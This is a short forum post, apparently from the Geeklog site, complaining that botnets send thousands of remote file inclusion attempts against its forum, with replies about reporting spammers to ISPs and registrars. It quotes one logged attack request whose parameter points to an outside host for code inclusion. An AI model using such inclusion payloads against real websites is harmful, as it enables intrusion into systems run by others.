Offtopic: Script kiddies

Script kiddies are stupid - or they wouldn't be script kiddies. Okay. But even the most dense script kiddie, in control of a few hundred bots, should eventually realize that the web doesn't work like real-life objects. Or so you would think.

Let's see:

"GET /forum/viewtopic.php?showtopic=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1"

Sorry, no dice. Our forum software only accepts a numerical value there, no URLs.

But what does our script kiddie and his botnet do? They try another 7000 times, with the exact same request. As if, like a real-life object, it would eventually break and give in if you only keep hammering at it long enough.

Inclusion attempts like the above are making up more than 30% of all the requests we get on geeklog.net these days. Not a single one of them has ever succeeded in doing anything. They are just one big waste of CPU cycles and bandwidth.

Someone please beat some sense into those idiots.

Really! Can I? On a serious note though, I've been working on getting these spammers kicked off of every possible ISP they connect from. Not only that, the domains that they advertise their spam products or services with are also terminated. It just takes time to get these things done. Sometimes I feel I'm the only one making an effort in supplying these registrars and ISPs with the ammo to terminate them.

I just talked to Network Solutions on the phone an hour ago and wanted to find out their abuse email for reporting. You know what they said,"We're sorry, but if you are not one of our customers, we cannot give you that information." Imagine that, one of the top registrars not wanting to cooperate. It took almost an hour going from one agent to the next. Finally I said that I wanted to talk to the head supervisor or I was going to make a formal complaint to ICANN about their conduct. They finally gave in and gave me the email address of reportspam@networksolutions.com Who knows if it'll ever get thru to them or not, considering the attitude I was given on the phone.

Hi, Glad I found your messages about this issue. I'm also getting these spam entries en masse in my logfiles, are also trying to make isp's aware of that form of abuse. A pain in the Neck really.
